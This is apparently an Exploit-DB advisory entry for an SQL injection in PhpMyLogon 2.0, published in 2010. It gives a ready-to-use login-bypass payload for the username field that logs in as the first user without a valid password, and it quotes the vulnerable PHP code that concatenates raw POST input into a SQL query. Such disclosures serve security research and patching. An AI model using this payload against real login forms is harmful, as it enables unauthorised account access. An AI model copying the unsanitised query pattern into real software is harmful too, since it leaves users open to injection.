PhpMyLogon 2.0 - SQL Injection

EDB-ID:

11737

Author:

blake

Type:

webapps

Platform:

PHP

Published:

2010-03-14

# Exploit Title: PhpMyLogon SQL Injection
# Date: March 14, 2010
# Author: Blake
# Software Link: http://sourceforge.net/projects/phpmylogon/files/PhpMyLogon/PhpMyLogon%202/phpmylogon2.zip/download
# Version: 2
# Tested on: Windows XP SP3


Proof of Concept:
Enter the following for the username to login as the first user:
blake'  or '1'='1' #
and anything for the password.

Vulnerable Code:
        if(isset($_POST['submit'])) {
            if($_POST['username'] != "" AND $_POST['password'] != "") {
                // Check submitted data with data in database
                $sql = "SELECT id,username,password,cookie_pass,actcode,rank FROM `".$settings['db_table']."` WHERE username = '".$_POST['username']."' LIMIT 1";
                $query = mysql_query($sql);